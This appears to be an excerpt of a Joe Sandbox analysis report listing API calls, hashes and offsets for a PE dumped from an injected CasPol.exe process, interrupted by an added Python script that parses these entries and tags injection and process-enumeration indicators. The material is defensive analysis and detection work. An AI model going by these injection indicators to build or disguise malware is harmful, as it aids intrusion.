                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                    • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2154303073-0
                                                                                                                                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                    • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                    • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3859505661-0
                                                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
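The function entries above all come from the same memory dump: a PE carved out of the CasPol.exe process (PID 0x1D, image base 0x400000), and several of them show behaviour worth pulling out when triaging by hand: LoadLibraryW from the system directory followed by GetProcAddress (imports resolved at runtime rather than through the import table), GetProcAddress of the psapi process-enumeration functions, and PrivateProfile calls (INI-file read/write). The following Python script is an added example, not part of the Joe Sandbox report or its tooling. It parses entries in the format shown on this page and applies those triage rules. It assumes that the .sdmp file name is laid out as pid.round.id.base.protection..., with the fifth field being the Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE); the PID, round and base fields are confirmed by the matching hcaresult_29_2_400000 snapshot name, the protection field is an assumption. The sample input is copied from entries on this page, trimmed to the lines the parser reads.

```python
"""Parse Joe Sandbox 'Executed Functions' entries and apply simple triage rules.

Added example, not part of the Joe Sandbox report. Assumption: the .sdmp name is
<pid>.<round>.<id>.<base>.<protection>.... and the fifth field holds the Win32
page protection (winnt.h values)."""
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40   # winnt.h
PAGE_EXECUTE_WRITECOPY = 0x80   # winnt.h
WRITABLE_EXECUTABLE = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}
PSAPI_ENUM = {"EnumProcesses", "EnumProcessModules",
              "GetModuleFileNameExW", "GetModuleInformation"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
INI_APIS = {"GetPrivateProfileIntW", "GetPrivateProfileStringW",
            "WritePrivateProfileStringW"}

BULLET = "\u2022 "  # the report prefixes every data line with a bullet
SDMP_RE = re.compile(r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.\d+\."
                     r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.")
SOURCE_RE = re.compile(r"^Source File: (?P<file>[^,]+), Offset: [0-9A-Fa-f]+, "
                       r"based on PE: (?P<pe>true|false)$")
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: "
                    r"(?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)   # one dict per API line
    source: dict = field(default_factory=dict)  # parsed .sdmp name
    based_on_pe: bool = False
    api_id: str = ""
    instruction_hash: str = ""


def parse_sdmp_name(name):
    """Split a dump file name into pid, dump round, base and page protection."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("unexpected .sdmp name: " + name)
    prot = int(m["prot"], 16)
    return {"pid": int(m["pid"], 16), "round": int(m["round"], 16),
            "base": int(m["base"], 16), "protection": prot,
            "writable_executable": (prot & 0xFF) in WRITABLE_EXECUTABLE}


def parse_entries(text):
    """One FunctionEntry per block; a block ends at its Instruction Fuzzy Hash line."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(BULLET):
            continue  # section headers such as APIs / Memory Dump Source / Similarity
        body = line[len(BULLET):]
        if body.startswith("Instruction Fuzzy Hash:"):
            cur.instruction_hash = body.split(":", 1)[1].strip()
            entries.append(cur)
            cur = FunctionEntry()
        elif body.startswith("API ID:"):
            cur.api_id = body.split(":", 1)[1].strip()
        elif (m := SOURCE_RE.match(body)):
            cur.source = parse_sdmp_name(m["file"])
            cur.based_on_pe = m["pe"] == "true"
        elif (m := API_RE.match(body)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append({"api": m["api"], "module": m["mod"], "args": args,
                              "ref": m["ref"], "subcall": m["sub"]})
    return entries


def triage(entry):
    """Return the triage tags that apply to one function entry, in a fixed order."""
    tags = []
    apis = {c["api"] for c in entry.calls}
    # names the function hands to GetProcAddress (direct calls and subcalls)
    resolved = {a for c in entry.calls if c["api"] == "GetProcAddress" for a in c["args"]}
    if entry.based_on_pe and entry.source.get("writable_executable"):
        tags.append("pe_in_rwx_memory")   # PE carved from RWX pages, not a mapped image
    if "GetProcAddress" in apis and apis & LOADERS:
        tags.append("runtime_import_resolution")
    if resolved & PSAPI_ENUM:
        tags.append("psapi_process_enumeration")
    if apis & INI_APIS:
        tags.append("ini_state_file")
    return tags


# Sample input: three entries copied from this report, trimmed to the parsed lines.
SAMPLE = """\
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: AddressProc$FileModuleName
• Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: PrivateProfile$StringWrite_itowmemset
• Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(hex(e.source["pid"]), hex(e.source["base"]), e.api_id, triage(e))
```

The tags are deliberately coarse. A PE in RWX pages of a foreign process is the injection indicator; runtime import resolution and psapi enumeration are common in packers and legitimate software too, so they are supporting evidence rather than verdicts on their own. Run the script against the full "Executed Functions" text of a report to get one line per function with the rules that fired.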
APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
• Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
APIs
• WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
                                                                                                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                    Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
• Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
• Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
• Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
